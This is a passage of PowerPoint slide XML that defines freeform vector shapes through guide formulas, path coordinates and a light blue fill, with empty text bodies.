                  <a:gd name="T47" fmla="*/ 28 h 183"/>
                  <a:gd name="T48" fmla="*/ 94 w 119"/>
                  <a:gd name="T49" fmla="*/ 26 h 183"/>
                  <a:gd name="T50" fmla="*/ 94 w 119"/>
                  <a:gd name="T51" fmla="*/ 15 h 183"/>
                  <a:gd name="T52" fmla="*/ 89 w 119"/>
                  <a:gd name="T53" fmla="*/ 13 h 183"/>
                  <a:gd name="T54" fmla="*/ 87 w 119"/>
                  <a:gd name="T55" fmla="*/ 8 h 183"/>
                  <a:gd name="T56" fmla="*/ 87 w 119"/>
                  <a:gd name="T57" fmla="*/ 0 h 183"/>
                  <a:gd name="T58" fmla="*/ 93 w 119"/>
                  <a:gd name="T59" fmla="*/ 1 h 183"/>
                  <a:gd name="T60" fmla="*/ 102 w 119"/>
                  <a:gd name="T61" fmla="*/ 17 h 183"/>
                  <a:gd name="T62" fmla="*/ 102 w 119"/>
                  <a:gd name="T63" fmla="*/ 30 h 183"/>
                  <a:gd name="T64" fmla="*/ 105 w 119"/>
                  <a:gd name="T65" fmla="*/ 43 h 183"/>
                  <a:gd name="T66" fmla="*/ 109 w 119"/>
                  <a:gd name="T67" fmla="*/ 50 h 183"/>
                  <a:gd name="T68" fmla="*/ 108 w 119"/>
                  <a:gd name="T69" fmla="*/ 51 h 183"/>
                  <a:gd name="T70" fmla="*/ 94 w 119"/>
                  <a:gd name="T71" fmla="*/ 50 h 183"/>
                  <a:gd name="T72" fmla="*/ 89 w 119"/>
                  <a:gd name="T73" fmla="*/ 50 h 183"/>
                  <a:gd name="T74" fmla="*/ 85 w 119"/>
                  <a:gd name="T75" fmla="*/ 57 h 183"/>
                  <a:gd name="T76" fmla="*/ 102 w 119"/>
                  <a:gd name="T77" fmla="*/ 73 h 183"/>
                  <a:gd name="T78" fmla="*/ 109 w 119"/>
                  <a:gd name="T79" fmla="*/ 88 h 183"/>
                  <a:gd name="T80" fmla="*/ 109 w 119"/>
                  <a:gd name="T81" fmla="*/ 90 h 183"/>
                  <a:gd name="T82" fmla="*/ 101 w 119"/>
                  <a:gd name="T83" fmla="*/ 105 h 183"/>
                  <a:gd name="T84" fmla="*/ 94 w 119"/>
                  <a:gd name="T85" fmla="*/ 112 h 183"/>
                  <a:gd name="T86" fmla="*/ 93 w 119"/>
                  <a:gd name="T87" fmla="*/ 116 h 183"/>
                  <a:gd name="T88" fmla="*/ 95 w 119"/>
                  <a:gd name="T89" fmla="*/ 130 h 183"/>
                  <a:gd name="T90" fmla="*/ 100 w 119"/>
                  <a:gd name="T91" fmla="*/ 139 h 183"/>
                  <a:gd name="T92" fmla="*/ 103 w 119"/>
                  <a:gd name="T93" fmla="*/ 149 h 183"/>
                  <a:gd name="T94" fmla="*/ 113 w 119"/>
                  <a:gd name="T95" fmla="*/ 160 h 183"/>
                  <a:gd name="T96" fmla="*/ 118 w 119"/>
                  <a:gd name="T97" fmla="*/ 172 h 183"/>
                  <a:gd name="T98" fmla="*/ 118 w 119"/>
                  <a:gd name="T99" fmla="*/ 176 h 183"/>
                  <a:gd name="T100" fmla="*/ 117 w 119"/>
                  <a:gd name="T101" fmla="*/ 183 h 183"/>
                  <a:gd name="T102" fmla="*/ 104 w 119"/>
                  <a:gd name="T103" fmla="*/ 178 h 183"/>
                  <a:gd name="T104" fmla="*/ 96 w 119"/>
                  <a:gd name="T105" fmla="*/ 176 h 183"/>
                  <a:gd name="T106" fmla="*/ 91 w 119"/>
                  <a:gd name="T107" fmla="*/ 176 h 183"/>
                  <a:gd name="T108" fmla="*/ 79 w 119"/>
                  <a:gd name="T109" fmla="*/ 176 h 183"/>
                  <a:gd name="T110" fmla="*/ 67 w 119"/>
                  <a:gd name="T111" fmla="*/ 174 h 183"/>
                  <a:gd name="T112" fmla="*/ 49 w 119"/>
                  <a:gd name="T113" fmla="*/ 173 h 183"/>
                  <a:gd name="T114" fmla="*/ 42 w 119"/>
                  <a:gd name="T115" fmla="*/ 176 h 183"/>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19"/>
                  <a:gd name="T175" fmla="*/ 0 h 183"/>
                  <a:gd name="T176" fmla="*/ 119 w 119"/>
                  <a:gd name="T177" fmla="*/ 183 h 183"/>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19" h="183">
                    <a:moveTo>
                      <a:pt x="42" y="176"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="28" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="176"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36438" name="Freeform 170"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2875" y="2735"/>
                <a:ext cx="119" cy="183"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 28 w 119"/>
                  <a:gd name="T1" fmla="*/ 176 h 183"/>
                  <a:gd name="T2" fmla="*/ 21 w 119"/>
                  <a:gd name="T3" fmla="*/ 175 h 183"/>
                  <a:gd name="T4" fmla="*/ 21 w 119"/>
                  <a:gd name="T5" fmla="*/ 164 h 183"/>
                  <a:gd name="T6" fmla="*/ 19 w 119"/>
                  <a:gd name="T7" fmla="*/ 155 h 183"/>
                  <a:gd name="T8" fmla="*/ 19 w 119"/>
                  <a:gd name="T9" fmla="*/ 148 h 183"/>
                  <a:gd name="T10" fmla="*/ 15 w 119"/>
                  <a:gd name="T11" fmla="*/ 144 h 183"/>
                  <a:gd name="T12" fmla="*/ 7 w 119"/>
                  <a:gd name="T13" fmla="*/ 143 h 183"/>
                  <a:gd name="T14" fmla="*/ 6 w 119"/>
                  <a:gd name="T15" fmla="*/ 137 h 183"/>
                  <a:gd name="T16" fmla="*/ 1 w 119"/>
                  <a:gd name="T17" fmla="*/ 134 h 183"/>
                  <a:gd name="T18" fmla="*/ 3 w 119"/>
                  <a:gd name="T19" fmla="*/ 129 h 183"/>
                  <a:gd name="T20" fmla="*/ 4 w 119"/>
                  <a:gd name="T21" fmla="*/ 118 h 183"/>
                  <a:gd name="T22" fmla="*/ 14 w 119"/>
                  <a:gd name="T23" fmla="*/ 108 h 183"/>
                  <a:gd name="T24" fmla="*/ 26 w 119"/>
                  <a:gd name="T25" fmla="*/ 99 h 183"/>
                  <a:gd name="T26" fmla="*/ 35 w 119"/>
                  <a:gd name="T27" fmla="*/ 100 h 183"/>
                  <a:gd name="T28" fmla="*/ 41 w 119"/>
                  <a:gd name="T29" fmla="*/ 108 h 183"/>
                  <a:gd name="T30" fmla="*/ 45 w 119"/>
                  <a:gd name="T31" fmla="*/ 104 h 183"/>
                  <a:gd name="T32" fmla="*/ 50 w 119"/>
                  <a:gd name="T33" fmla="*/ 96 h 183"/>
                  <a:gd name="T34" fmla="*/ 60 w 119"/>
                  <a:gd name="T35" fmla="*/ 74 h 183"/>
                  <a:gd name="T36" fmla="*/ 64 w 119"/>
                  <a:gd name="T37" fmla="*/ 72 h 183"/>
                  <a:gd name="T38" fmla="*/ 67 w 119"/>
                  <a:gd name="T39" fmla="*/ 61 h 183"/>
                  <a:gd name="T40" fmla="*/ 70 w 119"/>
                  <a:gd name="T41" fmla="*/ 58 h 183"/>
                  <a:gd name="T42" fmla="*/ 75 w 119"/>
                  <a:gd name="T43" fmla="*/ 50 h 183"/>
                  <a:gd name="T44" fmla="*/ 83 w 119"/>
                  <a:gd name="T45" fmla="*/ 32 h 183"/>
                  <a:gd name="T46" fmla="*/ 91 w 119"/>
                  <a:gd name="T47" fmla="*/ 28 h 183"/>
                  <a:gd name="T48" fmla="*/ 94 w 119"/>
                  <a:gd name="T49" fmla="*/ 26 h 183"/>
                  <a:gd name="T50" fmla="*/ 94 w 119"/>
                  <a:gd name="T51" fmla="*/ 15 h 183"/>
                  <a:gd name="T52" fmla="*/ 89 w 119"/>
                  <a:gd name="T53" fmla="*/ 13 h 183"/>
                  <a:gd name="T54" fmla="*/ 87 w 119"/>
                  <a:gd name="T55" fmla="*/ 8 h 183"/>
                  <a:gd name="T56" fmla="*/ 87 w 119"/>
                  <a:gd name="T57" fmla="*/ 0 h 183"/>
                  <a:gd name="T58" fmla="*/ 93 w 119"/>
                  <a:gd name="T59" fmla="*/ 1 h 183"/>
                  <a:gd name="T60" fmla="*/ 102 w 119"/>
                  <a:gd name="T61" fmla="*/ 17 h 183"/>
                  <a:gd name="T62" fmla="*/ 102 w 119"/>
                  <a:gd name="T63" fmla="*/ 30 h 183"/>
                  <a:gd name="T64" fmla="*/ 105 w 119"/>
                  <a:gd name="T65" fmla="*/ 43 h 183"/>
                  <a:gd name="T66" fmla="*/ 109 w 119"/>
                  <a:gd name="T67" fmla="*/ 50 h 183"/>
                  <a:gd name="T68" fmla="*/ 108 w 119"/>
                  <a:gd name="T69" fmla="*/ 51 h 183"/>
                  <a:gd name="T70" fmla="*/ 94 w 119"/>
                  <a:gd name="T71" fmla="*/ 50 h 183"/>
                  <a:gd name="T72" fmla="*/ 89 w 119"/>
                  <a:gd name="T73" fmla="*/ 50 h 183"/>
                  <a:gd name="T74" fmla="*/ 85 w 119"/>
                  <a:gd name="T75" fmla="*/ 57 h 183"/>
                  <a:gd name="T76" fmla="*/ 102 w 119"/>
                  <a:gd name="T77" fmla="*/ 73 h 183"/>
                  <a:gd name="T78" fmla="*/ 109 w 119"/>
                  <a:gd name="T79" fmla="*/ 88 h 183"/>
                  <a:gd name="T80" fmla="*/ 109 w 119"/>
                  <a:gd name="T81" fmla="*/ 90 h 183"/>
                  <a:gd name="T82" fmla="*/ 101 w 119"/>
                  <a:gd name="T83" fmla="*/ 105 h 183"/>
                  <a:gd name="T84" fmla="*/ 94 w 119"/>
                  <a:gd name="T85" fmla="*/ 112 h 183"/>
                  <a:gd name="T86" fmla="*/ 93 w 119"/>
                  <a:gd name="T87" fmla="*/ 116 h 183"/>
                  <a:gd name="T88" fmla="*/ 95 w 119"/>
                  <a:gd name="T89" fmla="*/ 130 h 183"/>
                  <a:gd name="T90" fmla="*/ 100 w 119"/>
                  <a:gd name="T91" fmla="*/ 139 h 183"/>
                  <a:gd name="T92" fmla="*/ 103 w 119"/>
                  <a:gd name="T93" fmla="*/ 149 h 183"/>
                  <a:gd name="T94" fmla="*/ 113 w 119"/>
                  <a:gd name="T95" fmla="*/ 160 h 183"/>
                  <a:gd name="T96" fmla="*/ 118 w 119"/>
                  <a:gd name="T97" fmla="*/ 172 h 183"/>
                  <a:gd name="T98" fmla="*/ 118 w 119"/>
                  <a:gd name="T99" fmla="*/ 176 h 183"/>
                  <a:gd name="T100" fmla="*/ 117 w 119"/>
                  <a:gd name="T101" fmla="*/ 183 h 183"/>
                  <a:gd name="T102" fmla="*/ 104 w 119"/>
                  <a:gd name="T103" fmla="*/ 178 h 183"/>
                  <a:gd name="T104" fmla="*/ 96 w 119"/>
                  <a:gd name="T105" fmla="*/ 176 h 183"/>
                  <a:gd name="T106" fmla="*/ 91 w 119"/>
                  <a:gd name="T107" fmla="*/ 176 h 183"/>
                  <a:gd name="T108" fmla="*/ 79 w 119"/>
                  <a:gd name="T109" fmla="*/ 176 h 183"/>
                  <a:gd name="T110" fmla="*/ 67 w 119"/>
                  <a:gd name="T111" fmla="*/ 174 h 183"/>
                  <a:gd name="T112" fmla="*/ 49 w 119"/>
                  <a:gd name="T113" fmla="*/ 173 h 183"/>
                  <a:gd name="T114" fmla="*/ 42 w 119"/>
                  <a:gd name="T115" fmla="*/ 176 h 183"/>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19"/>
                  <a:gd name="T175" fmla="*/ 0 h 183"/>
                  <a:gd name="T176" fmla="*/ 119 w 119"/>
                  <a:gd name="T177" fmla="*/ 183 h 183"/>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19" h="183">
                    <a:moveTo>
                      <a:pt x="42" y="176"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="28" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="175"/>
